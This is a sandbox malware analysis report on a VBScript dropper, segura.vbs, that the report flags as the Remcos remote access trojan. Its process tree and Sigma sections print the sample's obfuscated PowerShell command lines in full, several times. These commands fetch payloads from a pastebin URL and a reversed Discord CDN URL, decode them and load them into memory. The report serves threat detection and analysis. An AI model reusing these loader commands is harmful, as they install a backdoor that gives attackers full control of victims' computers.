Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
segura.vbs

Overview

General Information

Sample name:segura.vbs
Analysis ID:1545854
MD5:5fa27882d49b1bcf021faca879f41ecb
SHA1:bba7da6693438f19e241ccc82627227f74e53d3c
SHA256:bef0af387fe44cd78c261d4374ca93e940ed0ef55e7055d4a9fd5246a4913768
Tags:vbsuser-lontze7
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected MSILDownloaderGeneric
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1396 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\segura.vbs');powershell $Yolopolhggobek; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7028 cmdline: "C:\Windows\system32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • PING.EXE (PID: 7112 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 1816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 1812 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 6104 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 6368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 6068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 4044 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x18e466:$a1: Remcos restarted by watchdog!
        • 0x18e9de:$a3: %02i:%02i:%02i:%03i
        Process Memory Space: powershell.exe PID: 4952INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x1624d:$b2: ::FromBase64String(
        • 0x183e3:$b2: ::FromBase64String(
        • 0x1934e:$b2: ::FromBase64String(
        • 0x1a4b0:$b2: ::FromBase64String(
        • 0x1b729:$b2: ::FromBase64String(
        • 0x1c736:$b2: ::FromBase64String(
        • 0x1d6a1:$b2: ::FromBase64String(
        • 0x35bff:$b2: ::FromBase64String(
        • 0x367cd:$b2: ::FromBase64String(
        • 0x36900:$b2: ::FromBase64String(
        • 0x3b932:$b2: ::FromBase64String(
        • 0x3ba24:$b2: ::FromBase64String(
        • 0x3c95b:$b2: ::FromBase64String(
        • 0x4b330:$b2: ::FromBase64String(
        • 0x4c2fe:$b2: ::FromBase64String(
        • 0x4d269:$b2: ::FromBase64String(
        • 0x4e41c:$b2: ::FromBase64String(
        • 0x4f362:$b2: ::FromBase64String(
        • 0x4ff30:$b2: ::FromBase64String(
        • 0x6603f:$b2: ::FromBase64String(
        • 0x6700d:$b2: ::FromBase64String(
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.powershell.exe.2305184b690.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          4.2.powershell.exe.2305184b690.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URLDetects executables (downloaders) containing reversed URLs to raw contents of a pasteditekSHen
          • 0xc04c4:$u1: /moc.nibetsap//:sptth
          • 0xc2c04:$u1: /moc.nibetsap//:sptth
          4.2.powershell.exe.2305184b690.2.raw.unpackMALWARE_Win_DLAgent09Detects known downloader agentditekSHen
          • 0xc04d1:$h2: //:sptth
          • 0xc2c1e:$h2: //:sptth
          • 0xc04fb:$s1: DownloadString
          • 0xc2ce4:$s1: DownloadString
          • 0xd09e4:$s1: DownloadString
          • 0xc04f0:$s2: StrReverse
          • 0xc2cb4:$s2: StrReverse
          • 0xc0568:$s3: FromBase64String
          • 0xc2e84:$s3: FromBase64String
          • 0xd39e:$s4: WebClient
          4.2.powershell.exe.23052ec24b8.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            4.2.powershell.exe.23052ec24b8.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URLDetects executables (downloaders) containing reversed URLs to raw contents of a pasteditekSHen
            • 0x16ea04:$u1: /moc.nibetsap//:sptth
            Click to see the 1 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\
            Sigma detected: Invoke-Obfuscation CLIP+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE
            Sigma detected: Invoke-Obfuscation VAR+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 